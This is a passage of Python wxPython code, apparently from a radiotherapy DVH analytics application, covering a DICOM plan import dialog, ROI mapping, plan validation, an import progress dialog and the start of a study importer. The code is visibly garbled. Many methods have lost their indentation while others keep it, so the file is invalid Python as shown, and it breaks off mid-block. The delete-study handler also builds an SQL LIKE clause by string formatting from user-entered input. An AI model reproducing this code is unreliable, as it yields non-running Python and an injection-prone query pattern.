data = self.parsed_dicom_data[uid]
self.input["mrn"].SetValue(data.mrn)
self.input["study_instance_uid"].SetValue(
data.study_instance_uid_to_be_imported
)
if data.birth_date is None or data.birth_date == "":
self.input["birth_date"].SetValue("")
else:
self.input["birth_date"].SetValue(
datetime_to_date_string(data.birth_date)
)
if data.sim_study_date is None or data.sim_study_date == "":
self.input["sim_study_date"].SetValue("")
else:
self.input["sim_study_date"].SetValue(
datetime_to_date_string(data.sim_study_date)
)
physician = ["DEFAULT", data.physician][
data.physician in self.roi_map.get_physicians()
]
self.input["physician"].SetValue(physician)
self.input["tx_site"].SetValue(data.tx_site)
self.input["rx_dose"].SetValue(str(data.rx_dose))
self.dicom_importer.update_mapped_roi_status(data.physician)
self.update_all_roi_text_with_roi_type()
wx.EndBusyCursor()
self.update_physician_roi_choices()
self.enable_inputs()
else:
self.clear_plan_data()
self.enable_inputs(False)
self.selected_uid = None
self.tree_ctrl_roi.DeleteChildren(self.dicom_importer.root_rois)
self.selected_uid = uid
self.update_warning_label()
def on_roi_tree_select(self, evt):
self.allow_input_roi_apply = False
self.selected_roi = self.get_roi_tree_item_name(evt.GetItem())
self.update_roi_inputs()
self.allow_input_roi_apply = True
    def roi_tree_right_click_action(self, physician, roi_name, dlg, *evt):
        """Run dialog class ``dlg`` for roi_name/physician, then refresh status.

        :param dlg: a dialog class (e.g. AddPhysicianROI); instantiated here
        """
        dlg(self, physician, self.roi_map, roi_name)
        self.update_roi_inputs()
        self.dicom_importer.update_mapped_roi_status(physician)
    def on_roi_tree_right_click(self, evt):
        """Pop up a context menu to map/unmap the clicked ROI or rename it."""
        if (
            evt.GetItem().GetParent() is not None
        ):  # ignore right click on tree root node
            roi_name = (
                evt.GetItem().GetText().split(" ----- ")[0]
            )  # remove PTV flags
            physician = self.input["physician"].GetValue()
            # Image index 0 is the "yes"/mapped icon (see __set_properties)
            is_mapped = not evt.GetItem().GetImage()

            # TODO: This block of code works, but is overly complicated
            msg_prepend = "%s %s as" % (["Add", "Remove"][is_mapped], roi_name)
            labels = [
                "%s %s" % (msg_prepend, roi_type)
                for roi_type in ["Physician ROI", "Variation"]
            ]
            if is_mapped:
                # Removing: pick the dialog matching what the name currently is
                if self.roi_map.is_physician_roi(roi_name, physician):
                    dlg_objects = [DelPhysicianROI]
                    labels = [labels[0]]
                else:
                    dlg_objects = [DelVariation]
                    labels = [labels[1]]
            else:
                # Adding: offer both "new physician ROI" and "variation"
                dlg_objects = [AddPhysicianROI, AssignVariation]

            pre_func = partial(
                self.roi_tree_right_click_action, physician, roi_name
            )

            popup = PopupMenu(self)
            for i, label in enumerate(labels):
                # Mapping edits are not offered for the DEFAULT physician
                if self.input["physician"].GetValue() != "DEFAULT":
                    popup.add_menu_item(
                        label, partial(pre_func, dlg_objects[i])
                    )
            # if is_mapped:
            #     popup.add_menu_item("Do Not Import", partial(pre_func, dlg_objects[0]))
            popup.add_menu_item(
                "Edit ROI Name", partial(self.change_plan_roi_name, evt)
            )
            popup.run()
def change_plan_roi_name(self, evt_tree, *evt):
ChangePlanROIName(
self.tree_ctrl_roi,
evt_tree.GetItem(),
self.selected_uid,
self.parsed_dicom_data[self.selected_uid],
self.dicom_importer,
)
self.dicom_importer.update_mapped_roi_status(
self.input["physician"].GetValue()
)
self.update_physician_roi_choices()
def update_input_roi_physician_enable(self):
if self.selected_roi:
if self.input_roi["physician"].GetValue() == "uncategorized":
self.input_roi["physician"].Enable()
self.button_save_roi_type_in_map.Disable()
else:
self.input_roi["physician"].Disable()
self.button_save_roi_type_in_map.Enable()
self.input_roi["type"].Enable()
else:
self.input_roi["physician"].Disable()
self.input_roi["type"].Disable()
self.button_save_roi_type_in_map.Disable()
    def update_roi_inputs(self):
        """Sync the physician-ROI and ROI-type combo boxes to the selected ROI."""
        # Suppress on_apply_roi while values are set programmatically
        self.allow_input_roi_apply = False
        physician = self.input["physician"].GetValue()
        if self.selected_roi and self.roi_map.is_physician(physician) and \
                self.selected_roi in self.dicom_importer.roi_name_map:
            physician_roi = self.roi_map.get_physician_roi(
                physician, self.selected_roi
            )
            roi_key = self.dicom_importer.roi_name_map[self.selected_roi][
                "key"
            ]
            uid = self.selected_uid
            roi_type = self.parsed_dicom_data[uid].get_roi_type(roi_key)
            self.input_roi["physician"].SetValue(physician_roi)
            self.update_physician_roi_choices(physician_roi)
            self.input_roi["type"].SetValue(roi_type)
            self.update_roi_text_with_roi_type(self.selected_roi, roi_type)
        else:
            # No valid selection/physician: blank the ROI inputs
            self.input_roi["physician"].SetValue("")
            self.input_roi["type"].SetValue("")
        self.allow_input_roi_apply = True
        self.update_input_roi_physician_enable()
def update_roi_text_with_roi_type(self, roi, roi_type):
roi_type_for_tree_text = [None, "PTV"][roi_type == "PTV"]
self.dicom_importer.update_tree_ctrl_roi_with_roi_type(
roi, roi_type=roi_type_for_tree_text
)
def update_all_roi_text_with_roi_type(self):
self.parsed_dicom_data[self.selected_uid].autodetect_target_roi_type()
for roi in list(self.dicom_importer.roi_name_map):
roi_key = self.dicom_importer.roi_name_map[roi]["key"]
roi_type = self.parsed_dicom_data[self.selected_uid].get_roi_type(
roi_key
)
self.update_roi_text_with_roi_type(roi, roi_type)
def clear_plan_data(self):
for input_obj in self.input.values():
input_obj.SetValue("")
self.reset_label_colors()
    def get_file_tree_item_plan_uid(self, item):
        """Return the plan UID for a node in the import file tree.

        Descends to a plan-level node: a plan node is used directly, a study
        node's first child is a plan, a patient node's first grandchild is a
        plan.

        :param item: a node from ``self.tree_ctrl_import``
        :return: the plan UID, or None if no plan node is resolved
        """
        plan_node = None
        node_id, node_type = self.dicom_importer.get_id_of_tree_ctrl_node(item)

        if node_type == "plan":
            plan_node = item
        elif node_type == "study":
            plan_node, valid = self.tree_ctrl_import.GetFirstChild(item)
        elif node_type == "patient":
            study_node, valid = self.tree_ctrl_import.GetFirstChild(item)
            plan_node, valid = self.tree_ctrl_import.GetFirstChild(study_node)

        if plan_node is not None:
            uid, node_type = self.dicom_importer.get_id_of_tree_ctrl_node(
                plan_node
            )
            return uid
def get_file_tree_item_study_uid(self, item):
study_node = None
node_id, node_type = self.dicom_importer.get_id_of_tree_ctrl_node(item)
if node_type == "study":
study_node = item
elif node_type == "plan":
study_node, valid = self.tree_ctrl_import.GetItemParent(item)
elif node_type == "patient":
study_node, valid = self.tree_ctrl_import.GetFirstChild(item)
if study_node:
return self.dicom_importer.node_to_study_uid[study_node]
def get_roi_tree_item_name(self, item):
for name, node in self.dicom_importer.roi_nodes.items():
if item == node:
return name
return None
def on_text_change(self, evt):
for key, input_obj in self.input.items():
if input_obj.GetId() == evt.GetId():
self.update_label_text_color(key)
return
    def on_physician_change(self):
        """Refresh all ROI-related UI state after the physician input changes."""
        self.update_physician_roi_choices()
        physician = self.input["physician"].GetValue()
        if physician:
            self.enable_roi_inputs()
        else:
            self.disable_roi_inputs()

        self.update_roi_inputs()
        self.dicom_importer.update_mapped_roi_status(physician)
        # NOTE(review): second call after update_mapped_roi_status —
        # presumably to reflect mapping changes; confirm the first call
        # above is still required
        self.update_roi_inputs()
def update_label_text_color(self, key):
red_value = [255, 0][self.input[key].GetValue() != ""]
self.label[key].SetForegroundColour(wx.Colour(red_value, 0, 0))
def reset_label_colors(self):
for label in self.label.values():
label.SetForegroundColour(wx.Colour(0, 0, 0))
def enable_inputs(self, *arg):
if arg:
enable = arg[0]
else:
enable = True
for input_obj in self.input.values():
input_obj.Enable(enable)
self.button_edit_sim_study_date.Enable(enable)
self.button_edit_birth_date.Enable(enable)
self.button_apply_plan_data.Enable(enable)
self.button_roi_manager.Enable(enable)
self.button_delete_study.Enable(enable)
self.button_add_physician.Enable(enable)
for check_box in self.checkbox.values():
check_box.Enable(enable)
def disable_roi_inputs(self):
for input_obj in self.input_roi.values():
input_obj.Disable()
self.button_save_roi_type_in_map.Disable()
def enable_roi_inputs(self):
for key, input_obj in self.input_roi.items():
if key not in {"physician", "type"}:
input_obj.Enable()
    def update_physician_roi_choices(self, physician_roi=None):
        """Reload the physician ROI combo box for the current physician.

        :param physician_roi: if "uncategorized", already-used physician ROIs
            are filtered out of the choices; any non-None value is set as the
            combo's current value afterwards
        """
        physician = self.input["physician"].GetValue()
        if self.roi_map.is_physician(physician):
            choices = self.roi_map.get_physician_rois(physician)
        else:
            choices = []
        if choices and physician_roi in {"uncategorized"}:
            # offer only physician ROIs not already assigned in this plan
            choices = list(
                set(choices)
                - set(self.dicom_importer.get_used_physician_rois(physician))
            )
            choices.sort()
            choices.append("uncategorized")
        self.input_roi["physician"].Clear()
        self.input_roi["physician"].Append(choices)
        if physician_roi is not None:
            self.input_roi["physician"].SetValue(physician_roi)
def on_apply_plan(self, evt):
wx.BeginBusyCursor()
current_physician = self.input["physician"].GetValue()
self.on_physician_change()
over_rides = self.parsed_dicom_data[self.selected_uid].plan_over_rides
apply_all_selected = False
for key in list(over_rides):
value = self.input[key].GetValue()
if "date" in key:
value = self.validate_date(value)
elif key == "rx_dose":
value = self.validate_dose(value)
else:
if not value:
value = None
over_rides[key] = value
# Apply all
if "%s_1" % key in list(self.checkbox):
apply_all_selected = True
if self.checkbox["%s_1" % key].IsChecked():
self.global_plan_over_rides[key]["value"] = value
self.global_plan_over_rides[key][
"only_if_missing"
] = self.checkbox["%s_2" % key].IsChecked()
self.clear_plan_check_boxes()
if apply_all_selected:
self.validate()
else:
self.validate(uid=self.selected_uid)
if current_physician != self.input["physician"]:
self.update_all_roi_text_with_roi_type()
self.update_warning_label()
wx.EndBusyCursor()
    def on_apply_roi(self, evt):
        """Apply the ROI type override from the widgets to the selected ROI.

        Skipped while widgets are being updated programmatically
        (``allow_input_roi_apply`` is False).
        """
        if self.allow_input_roi_apply:
            roi_type_over_ride = self.parsed_dicom_data[
                self.selected_uid
            ].roi_over_ride["type"]
            key = self.dicom_importer.roi_name_map[self.selected_roi]["key"]
            roi_type_over_ride[key] = self.input_roi["type"].GetValue()
            self.validate(uid=self.selected_uid)
            self.update_warning_label()
            self.dicom_importer.update_mapped_roi_status(
                self.input["physician"].GetValue()
            )
            self.update_roi_text_with_roi_type(
                self.selected_roi, roi_type=self.input_roi["type"].GetValue()
            )
@staticmethod
def validate_date(date):
try:
dt = parse_date(date)
truncated = datetime_obj(dt.year, dt.month, dt.day)
return str(truncated).replace("-", "")
except Exception:
return None
@staticmethod
def validate_dose(dose):
try:
return float(dose)
except ValueError:
return None
@staticmethod
def is_uid_valid(uid):
with DVH_SQL() as cnx:
valid_uid = not cnx.is_study_instance_uid_in_table("Plans", uid)
if valid_uid:
return True
return False
def clear_plan_check_boxes(self):
for checkbox in self.checkbox.values():
checkbox.SetValue(False)
def on_check_apply_all(self, evt):
for key in [
"birth_date",
"sim_study_date",
"physician",
"tx_site",
"rx_dose",
]:
if self.checkbox["%s_1" % key].GetId() == evt.GetId():
if not self.checkbox["%s_1" % key].IsChecked():
self.checkbox["%s_2" % key].SetValue(False)
return
if self.checkbox["%s_2" % key].GetId() == evt.GetId():
if self.checkbox["%s_2" % key].IsChecked():
self.checkbox["%s_1" % key].SetValue(True)
return
    def on_import(self, evt):
        """Validate prerequisites, persist options, and launch the import.

        Writes the ROI map, saves the checkbox-driven options, optionally
        opens the AssignPTV dialog for multi-plan studies (when dose
        summation is off), then starts the ImportWorker thread and shows
        the progress dialog. Error dialogs are shown when the SQL DB is not
        writable or no plans are selected.
        """
        if self.parsed_dicom_data and self.dicom_importer.checked_plans:
            if sql_write_test()["write"]:
                # self.patient_orientation_warning()
                self.roi_map.write_to_file()
                self.options.set_option(
                    "KEEP_IN_INBOX", self.checkbox_keep_in_inbox.GetValue()
                )
                self.options.set_option(
                    "AUTO_SUM_DOSE", self.checkbox_auto_sum_dose.GetValue()
                )
                self.options.set_option(
                    "COPY_MISC_FILES", self.checkbox_copy_misc_files.GetValue()
                )
                self.options.save()

                study_uid_dict = get_study_uid_dict(
                    list(self.dicom_importer.checked_plans),
                    self.parsed_dicom_data,
                    multi_plan_only=True,
                )
                finish_import = True
                # Without auto dose summation, multi-plan studies need PTVs
                # assigned per plan before import can continue
                if (
                    study_uid_dict
                    and not self.checkbox_auto_sum_dose.GetValue()
                ):
                    dlg = AssignPTV(
                        self, self.parsed_dicom_data, study_uid_dict
                    )
                    dlg.ShowModal()
                    finish_import = dlg.continue_status

                if finish_import:
                    ImportWorker(
                        self.parsed_dicom_data,
                        list(self.dicom_importer.checked_plans),
                        self.checkbox_include_uncategorized.GetValue(),
                        self.dicom_importer.other_dicom_files,
                        self.start_path,
                        self.checkbox_keep_in_inbox.GetValue(),
                        self.roi_map,
                        self.options.USE_DICOM_DVH,
                        self.checkbox_auto_sum_dose.GetValue(),
                        self.checkbox_copy_misc_files.GetValue(),
                    )
                    dlg = ImportStatusDialog()
                    # calling self.Close() below caused issues in Windows if Show() used instead of ShowModal()
                    [dlg.Show, dlg.ShowModal][is_windows()]()
                    self.Close()
                    self.do_unsubscribe()
            else:
                dlg = wx.MessageDialog(
                    self,
                    "Unable to write to SQL DB!",
                    caption="SQL Connection Failure",
                    style=wx.OK
                    | wx.OK_DEFAULT
                    | wx.CENTER
                    | wx.ICON_EXCLAMATION,
                )
                dlg.ShowModal()
                dlg.Destroy()
        else:
            dlg = wx.MessageDialog(
                self,
                "No plans have been selected.",
                caption="Import Failure",
                style=wx.OK | wx.OK_DEFAULT | wx.CENTER | wx.ICON_EXCLAMATION,
            )
            dlg.ShowModal()
            dlg.Destroy()
    def parse_dicom_data(self):
        """Kick off background parsing of all discovered DICOM file sets."""
        PreImportFileSetParserWorker(
            self.dicom_importer.dicom_file_paths,
            self.dicom_importer.other_dicom_files,
        )
def pre_import_complete(self):
self.label_progress.SetLabelText(
"Plan count: %s" % len(list(self.dicom_importer.plan_nodes))
)
self.is_all_data_parsed = True
wx.CallAfter(self.validate)
def pre_import_canceled(self):
self.label_progress.SetLabelText("")
self.label_warning.SetLabelText("Parsing Canceled")
    def set_pre_import_parsed_dicom_data(self, msg):
        """Store parsed data for one plan (pubsub callback) and refresh the GUI.

        :param msg: dict with "uid" and "init_params" for PreImportData
        """
        uid = msg["uid"]
        self.parsed_dicom_data[uid] = PreImportData(**msg["init_params"])
        self.parsed_dicom_data[
            uid
        ].global_plan_over_rides = self.global_plan_over_rides
        # fall back to auto-detected target types when no PTV is defined
        if not self.parsed_dicom_data[uid].ptv_exists:
            self.parsed_dicom_data[uid].autodetect_target_roi_type()
        self.validate(uid)
        self.update_warning_label()
        self.update_roi_inputs()
    def validate(self, uid=None):
        """Color-code plan nodes in the import tree by validation severity.

        red: missing study UID or incomplete file set (node also unchecked),
        orange: missing physician or PTV, yellow: any other failed check,
        no color: fully valid.

        :param uid: validate only this plan; None validates all plans
        """
        red = wx.Colour(255, 0, 0)
        orange = wx.Colour(255, 165, 0)
        yellow = wx.Colour(255, 255, 0)
        if self.is_all_data_parsed:
            if not uid:
                nodes = self.dicom_importer.plan_nodes
            else:
                nodes = {uid: self.dicom_importer.plan_nodes[uid]}
            for node_uid, node in nodes.items():
                if node_uid in list(self.parsed_dicom_data):
                    validation = self.parsed_dicom_data[node_uid].validation
                    failed_keys = {
                        key
                        for key, value in validation.items()
                        if not value["status"]
                    }
                else:
                    # plan never parsed: treat as an incomplete file set
                    failed_keys = {"complete_file_set"}

                if failed_keys:
                    if {
                        "study_instance_uid",
                        "complete_file_set",
                    }.intersection(failed_keys):
                        color = red
                    elif {"physician", "ptv"}.intersection(failed_keys):
                        color = orange
                    else:
                        color = yellow
                elif node_uid in self.dicom_importer.incomplete_plans:
                    color = red
                else:
                    color = None
                self.tree_ctrl_import.SetItemBackgroundColour(node, color)

                # NOTE(review): node_uid is a dict key and can never be None
                # here — confirm whether this guard was meant for something
                # else
                if node_uid is not None:
                    self.tree_ctrl_import.CheckItem(node, color != red)
    def update_warning_label(self):
        """Show the selected plan's warning text, or an incomplete-fileset
        error if the plan was never parsed."""
        msg = ""
        if self.selected_uid:
            if self.selected_uid in list(self.parsed_dicom_data):
                warning = self.parsed_dicom_data[self.selected_uid].warning
                msg = warning["label"]
                # track each incomplete study once
                if (
                    warning["incomplete"]
                    and self.selected_uid not in self.incomplete_studies
                ):
                    self.incomplete_studies.append(self.selected_uid)
            else:
                msg = "ERROR: Incomplete Fileset. RT Plan, Dose, and Structure required."
        self.label_warning.SetLabelText(msg)
    def on_delete_study(self, evt):
        """Delete all imported data matching the current study UID, after a
        confirmation dialog; informs the user if the UID is not in the DB."""
        uid = self.input["study_instance_uid"].GetValue()
        with DVH_SQL() as cnx:
            if cnx.is_uid_imported(uid):
                dlg = wx.MessageDialog(
                    self,
                    "Delete all data in database with this UID?",
                    caption="Delete Study",
                    style=wx.YES
                    | wx.NO
                    | wx.NO_DEFAULT
                    | wx.CENTER
                    | wx.ICON_EXCLAMATION,
                )
            else:
                dlg = wx.MessageDialog(
                    self,
                    "Study Instance UID not found in Database",
                    caption="Delete Study",
                    style=wx.OK | wx.CENTER | wx.ICON_EXCLAMATION,
                )
            res = dlg.ShowModal()
            # NOTE(review): Center() after ShowModal has no visible effect —
            # confirm intent
            dlg.Center()
            if res == wx.ID_YES:
                # As of DVH v0.7.5, study_instance_uid may end with _N where N is the nth plan of a file set
                cnx.delete_rows("study_instance_uid LIKE '%s%%'" % uid)
            dlg.Destroy()

        self.validate()  # Eclipse plans may have multiple plan UIDs for the same case, re-validate all plans
        self.update_warning_label()
    def on_edit_birth_date(self, evt):
        # Open the date picker bound to the birth_date input
        self.on_edit_date("birth_date")
    def on_edit_sim_study_date(self, evt):
        # Open the date picker bound to the sim_study_date input
        self.on_edit_date("sim_study_date")
    def on_edit_date(self, key):
        """Open a DatePicker that writes back to ``self.input[key]``, then
        re-validate the selected plan.

        :param key: "birth_date" or "sim_study_date"
        """
        DatePicker(
            initial_date=self.input[key].GetValue(),
            title=key.replace("_", " ").title(),
            action=self.input[key].SetValue,
        )
        self.validate(uid=self.selected_uid)
        self.update_warning_label()
    def on_roi_manager(self, evt):
        """Open the ROI Manager dialog, then refresh all ROI-related UI state."""
        RoiManager(
            self,
            self.roi_map,
            self.input["physician"].GetValue(),
            self.input_roi["physician"].GetValue(),
        )
        self.update_physician_choices(keep_old_physician=True)
        self.update_physician_roi_choices()
        self.update_roi_inputs()
        self.dicom_importer.update_mapped_roi_status(
            self.input["physician"].GetValue()
        )
        self.update_input_roi_physician_enable()
    def on_add_physician(self, evt):
        """Open the AddPhysician dialog, then reload the physician choices."""
        AddPhysician(
            self.roi_map, initial_physician=self.input["physician"].GetValue()
        )
        self.update_physician_choices()
def on_manage_physician_roi(self, evt):
physician = self.input["physician"].GetValue()
unlinked_institutional_rois = (
self.roi_map.get_unused_institutional_rois(physician)
)
AddPhysicianROI(self, physician, unlinked_institutional_rois)
    def on_manage_roi_type(self, evt):
        # Open the dialog for adding custom ROI types
        AddROIType(self)
def update_physician_choices(self, keep_old_physician=False):
old_physician = self.input["physician"].GetValue()
old_physicians = self.input["physician"].Items
new_physicians = self.roi_map.get_physicians()
new_physician = [
p for p in new_physicians if p and p not in old_physicians
]
self.input["physician"].Clear()
self.input["physician"].Append(new_physicians)
if not keep_old_physician and new_physician:
self.input["physician"].SetValue(new_physician[0])
else:
self.input["physician"].SetValue(old_physician)
    def on_physician_roi_change(self, evt):
        """Add the combo's physician ROI — and the selected ROI name as a
        variation of it — to the ROI map if not already present."""
        physician = self.input["physician"].GetValue()
        variation = self.selected_roi
        physician_roi = self.input_roi["physician"].GetValue()

        if physician_roi not in self.roi_map.get_physician_rois(physician):
            self.roi_map.add_physician_roi(physician, physician_roi)
        if variation not in self.roi_map.get_variations(
            physician, physician_roi
        ):
            self.roi_map.add_variations(physician, physician_roi, variation)

        self.dicom_importer.update_mapped_roi_status(physician)
        self.update_input_roi_physician_enable()
def patient_orientation_warning(self):
dsets = self.parsed_dicom_data
non_hfs = {
ds.mrn: ds.patient_orientation
for ds in dsets.values()
if ds.patient_orientation != "HFS"
}
if non_hfs:
caption = "Non-HFS Orientations Detected"
msg = (
"WARNGING: Due to a bug in dicompyler-core <=0.5.5, DVHs may be incorrect for non-HFS orientations."
" Please verify the following patients (MRNs):\n%s"
% ", ".join(sorted(list(non_hfs)))
)
ErrorDialog(self, msg, caption)
def on_save_roi_type_in_map(self, *evt):
physician = self.input["physician"].GetValue()
physician_roi = self.input_roi["physician"].GetValue()
roi_type = self.input_roi["type"].GetValue()
self.roi_map.set_roi_type(physician, physician_roi, roi_type)
class ImportStatusDialog(wx.Dialog):
    """
    Dialog with progress information about DICOM import
    """

    def __init__(self):
        wx.Dialog.__init__(self, None)
        self.gauge_study = wx.Gauge(self, wx.ID_ANY, 100)
        self.gauge_calculation = wx.Gauge(self, wx.ID_ANY, 100)
        self.button_cancel = wx.Button(self, wx.ID_CANCEL, "Cancel")

        self.__set_properties()
        self.__do_layout()
        self.__do_subscribe()

        self.Bind(
            wx.EVT_BUTTON, self.set_terminate, id=self.button_cancel.GetId()
        )
        self.Bind(wx.EVT_CLOSE, self.set_terminate)

        # baseline for the elapsed-time display
        self.start_time = datetime.now()

    def __do_subscribe(self):
        """Listen for progress messages published by ImportWorker."""
        pub.subscribe(self.update_patient, "update_patient")
        pub.subscribe(self.update_calculation, "update_calculation")
        pub.subscribe(self.update_dvh_progress, "update_dvh_progress")
        pub.subscribe(self.update_elapsed_time, "update_elapsed_time")
        pub.subscribe(self.close, "close")

    @staticmethod
    def do_unsubscribe():
        """Remove all listeners registered in __do_subscribe."""
        # BUG FIX: "update_dvh_progress" is subscribed above but was
        # previously missing here, leaking its listener after the dialog
        # closed
        for topic in [
            "update_patient",
            "update_calculation",
            "update_dvh_progress",
            "update_elapsed_time",
            "close",
        ]:
            pub.unsubAll(topicName=topic)

    def __set_properties(self):
        self.SetTitle("Import Progress")
        self.SetSize((700, 260))

    def __do_layout(self):
        sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
        sizer_progress = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_calculation = wx.BoxSizer(wx.VERTICAL)
        sizer_study = wx.BoxSizer(wx.VERTICAL)
        sizer_time_cancel = wx.BoxSizer(wx.HORIZONTAL)

        self.label_study_counter = wx.StaticText(
            self, wx.ID_ANY, " " * 12, style=wx.ALIGN_CENTER
        )
        sizer_study.Add(self.label_study_counter, 0, wx.ALIGN_CENTER, 0)
        self.label_patient = wx.StaticText(self, wx.ID_ANY, "Patient:")
        sizer_study.Add(self.label_patient, 0, 0, 0)
        self.label_study = wx.StaticText(
            self, wx.ID_ANY, "Plan SOP Instance UID:"
        )
        sizer_study.Add(self.label_study, 0, 0, 0)
        sizer_study.Add(self.gauge_study, 0, wx.EXPAND, 0)

        sizer_progress.Add(sizer_study, 0, wx.ALL | wx.EXPAND, 5)
        self.label_calculation = wx.StaticText(
            self, wx.ID_ANY, "Calculation: DVH"
        )
        sizer_calculation.Add(self.label_calculation, 0, 0, 0)
        self.label_structure = wx.StaticText(self, wx.ID_ANY, "")
        sizer_calculation.Add(self.label_structure, 0, 0, 0)
        sizer_calculation.Add(self.gauge_calculation, 0, wx.EXPAND, 0)
        sizer_progress.Add(sizer_calculation, 0, wx.ALL | wx.EXPAND, 5)
        sizer_wrapper.Add(sizer_progress, 0, wx.EXPAND | wx.ALL, 5)

        self.label_elapsed_time = wx.StaticText(
            self, wx.ID_ANY, "Elapsed time:"
        )
        sizer_time_cancel.Add(
            self.label_elapsed_time, 1, wx.EXPAND | wx.ALL, 5
        )
        sizer_time_cancel.Add(self.button_cancel, 0, wx.ALL, 5)
        sizer_wrapper.Add(sizer_time_cancel, 1, wx.EXPAND | wx.ALL, 5)

        self.SetSizer(sizer_wrapper)
        self.Layout()
        self.Center()

    def close(self):
        """Tear down pubsub listeners and destroy the dialog."""
        self.do_unsubscribe()
        self.Destroy()

    def update_patient(self, msg):
        """
        Update patient/study related information. Linked with pubsub to ImportWorker
        :param msg: study_number, study_total, patient_name, uid, and progress values
        :type msg: dict
        """
        wx.CallAfter(
            self.label_study_counter.SetLabelText,
            "Plan %s of %s" % (msg["study_number"], msg["study_total"]),
        )
        wx.CallAfter(
            self.label_patient.SetLabelText,
            "Patient: %s" % msg["patient_name"],
        )
        wx.CallAfter(
            self.label_study.SetLabelText,
            "Plan SOP Instance UID: %s" % msg["uid"],
        )
        wx.CallAfter(self.gauge_study.SetValue, msg["progress"])
        self.update_elapsed_time()

    def update_calculation(self, msg):
        """
        Update calculation related information. Linked with pubsub to ImportWorker
        :param msg: calculation type, roi_num, roi_total, roi_name, and progress values
        :type msg: dict
        """
        # Cancel is disabled while dose grids are being summed
        wx.CallAfter(
            self.button_cancel.Enable,
            "Dose Grid Summation" not in msg["calculation"],
        )
        wx.CallAfter(
            self.label_calculation.SetLabelText,
            "Calculation: %s" % msg["calculation"],
        )
        wx.CallAfter(self.gauge_calculation.SetValue, msg["progress"])
        if msg["roi_name"]:
            label_text = "Structure (%s of %s): %s" % (
                msg["roi_num"],
                msg["roi_total"],
                msg["roi_name"],
            )
        else:
            label_text = ""
        wx.CallAfter(self.label_structure.SetLabelText, label_text)
        self.update_elapsed_time()

    def update_dvh_progress(self, msg):
        """Append/replace a "[NN%]" suffix on the structure label.

        :param msg: fraction complete in [0, 1]
        """
        label = self.label_structure.GetLabelText()
        if "[" in label and label.endswith("%]"):
            label = label[: label.rfind("[")].strip()
        label = "%s [%0.0f%%]" % (label, msg * 100)
        wx.CallAfter(self.label_structure.SetLabelText, label)
        self.update_elapsed_time()

    def update_elapsed_time(self):
        """
        Update the elapsed time. Linked with pubsub to ImportWorker
        """
        elapsed_time = get_elapsed_time(self.start_time, datetime.now())
        wx.CallAfter(
            self.label_elapsed_time.SetLabelText,
            "Elapsed Time: %s" % elapsed_time,
        )

    def set_terminate(self, *evt):
        """Ask the user to confirm termination of the running import."""
        caption = "Terminate import?"
        MessageDialog(self, caption, action_yes_func=self.send_terminate)

    def send_terminate(self):
        """Broadcast termination to all import workers, then close."""
        pub.sendMessage("terminate_import")
        self.close()
class StudyImporter:
    """Import a single plan/study into the SQL database (work done in __init__)."""

    def __init__(
        self, init_params, msg, import_uncategorized, final_plan_in_study
    ):
        """
        Intended to import a study on init, no use afterwards as no properties available
        :param init_params: initial parameters to create DICOM_Parser object
        :type init_params: dict
        :param msg: initial pub message for update patient, includes plan counting and progress
        :type msg: dict
        :param import_uncategorized: import ROIs even if not in ROI map, if set to True
        :type import_uncategorized: bool
        :param final_plan_in_study: prompts composite PTV calculations if True
        :type final_plan_in_study: bool
        """
        # Store SQL time for deleting a partially imported plan
        with DVH_SQL() as cnx:
            self.last_import_time = cnx.now

        self.init_params = init_params
        self.msg = msg
        self.import_uncategorized = import_uncategorized
        self.final_plan_in_study = final_plan_in_study

        self.terminate = False
        pub.subscribe(self.set_terminate, "terminate_import")

        # failures are logged and partially-written rows rolled back
        try:
            self.run()
        except Exception as e:
            msg = "ERROR: Failed Import for %s %s" % \
                  (self.msg["patient_name"], self.msg["uid"])
            push_to_log(e, msg=msg)
            self.delete_partially_updated_plan()

    def run(self):
        """Parse the DICOM file set, compute and push DVHs/plan rows to SQL,
        then (on the study's final plan, or when plan PTVs are assigned) run
        the PTV-based post-import calculations."""
        wx.CallAfter(pub.sendMessage, "update_patient", msg=self.msg)
        wx.CallAfter(pub.sendMessage, "update_elapsed_time")
        msg = {
            "calculation": "DICOM Parsing",
            "roi_num": 1,
            "roi_total": 1,
            "roi_name": "",
            "progress": 0,
        }
        wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)

        parsed_data = DICOM_Parser(**self.init_params)

        wx.CallAfter(pub.sendMessage, "update_elapsed_time")

        # Storing this now, parsed_data sometimes gets cleared prior storing actual values in this message when
        # generating this immediately before pub.sendMessage
        move_msg = {
            "files": [
                parsed_data.plan_file,
                parsed_data.structure_file,
                parsed_data.dose_file,
            ],
            "mrn": parsed_data.mrn,
            "uid": parsed_data.study_instance_uid_to_be_imported,
            "import_path": parsed_data.import_path,
        }

        mrn = parsed_data.mrn
        study_uid = parsed_data.study_instance_uid_to_be_imported

        structures = parsed_data.structure_name_and_type
        # key -> display name, skipping marker structures
        roi_name_map = {
            key: structures[key]["name"]
            for key in list(structures)
            if structures[key]["type"] != "MARKER"
        }
        data_to_import = {
            "Plans": [parsed_data.get_plan_row()],
            "Rxs": parsed_data.get_rx_rows(),
            "Beams": parsed_data.get_beam_rows(),
            "DICOM_Files": [parsed_data.get_dicom_file_row()],
            "DVHs": [],
        }  # DVHs will only include PTVs, others pushed en route

        # remove uncategorized ROIs unless this is checked
        if not self.import_uncategorized:
            for roi_key in list(roi_name_map):
                try:
                    name = parsed_data.get_physician_roi(roi_key)
                    if name == "uncategorized":
                        roi_name_map.pop(roi_key)
                except Exception as e:
                    msg = "Failed to remove %s from import list" % \
                          roi_name_map[roi_key]
                    push_to_log(e, msg=msg)

        # Remove previously imported roi's (e.g., when dose summations occur)
        with DVH_SQL() as cnx:
            for roi_key in list(roi_name_map):
                if cnx.is_roi_imported(
                    clean_name(roi_name_map[roi_key]), study_uid
                ):
                    roi_name_map.pop(roi_key)

        roi_total = len(roi_name_map)
        ptvs = {key: [] for key in ["dvh", "volume", "index"]}

        for roi_counter, roi_key in enumerate(list(roi_name_map)):
            if self.terminate:
                continue
            else:
                # Send messages to status dialog about progress
                msg = {
                    "calculation": "DVH",
                    "roi_num": roi_counter + 1,
                    "roi_total": roi_total,
                    "roi_name": roi_name_map[roi_key],
                    "progress": int(100 * (roi_counter + 1) / roi_total),
                }

                wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
                wx.CallAfter(pub.sendMessage, "update_elapsed_time")
                try:
                    dvh_row = parsed_data.get_dvh_row(roi_key)
                except MemoryError as e:
